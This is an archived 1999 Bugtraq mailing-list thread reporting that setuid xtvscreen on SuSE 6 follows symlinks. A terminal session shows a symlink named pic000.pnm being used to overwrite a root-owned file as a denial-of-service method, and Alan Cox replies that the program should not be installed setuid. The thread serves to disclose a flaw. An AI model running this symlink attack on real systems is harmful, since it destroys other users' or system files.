Freaks Macintosh Archive

home *** CD-ROM | disk | FTP | other *** search

/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Happle / happle10.sit.hqx / Happle#10 / Files / Denial.sit / DoS / xtvscreen.suse6.txt < prev

Wrap

Internet Message Format | 1999-02-19 | 2KB

Date: Thu, 18 Feb 1999 15:54:24 +0000 From: Andre Cruz <afafc@CAMOES.RNL.IST.UTL.PT> To: BUGTRAQ@netspace.org Subject: xtvscreen and suse 6 You can use xtvscreen to overwrite any file on the system. Xtvscreen has a function to capture a snapshot and will write it as pic000.pnm, pic001.pnm, etc in it's working directory. It follows symlinks. root@korn:/tmp > ls -l exp -rw-r--r-- 1 root root 4 Feb 18 15:42 exp edevil@korn:~ > ln -s /tmp/exp pic000.pnm edevil@korn:~ > xtvscreen Sound mixer initialized ! Using Visual TrueColor msize: 0x00640000 /* Start->Capture goes here Start->Snapshot goes here */ [1]+ Stopped xtvscreen edevil@korn:~ > cd /tmp edevil@korn:/tmp > ls -l exp -rw-r--r-- 1 root root 453135 Feb 18 15:47 exp edevil@korn:/tmp > I don't know how to write arbitrary data to the file but it can be used for DoS. If this is already known I'm sorry. --- Andre Cruz afafc@camoes.rnl.ist.utl.pt ------------------------------------------------------------------------ Date: Thu, 18 Feb 1999 22:51:00 +0000 From: Alan Cox <alan@LXORGUK.UKUU.ORG.UK> To: BUGTRAQ@netspace.org Subject: Re: xtvscreen and suse 6 > You can use xtvscreen to overwrite any file on the system. > Xtvscreen has a function to capture a snapshot and will write it as Xtvscreen really should not be installed setuid. The only reason to do so is because something has to tell the capture card where the frame buffer is. This should be the Xserver (patched), or one of the small helper applications available for this. Alan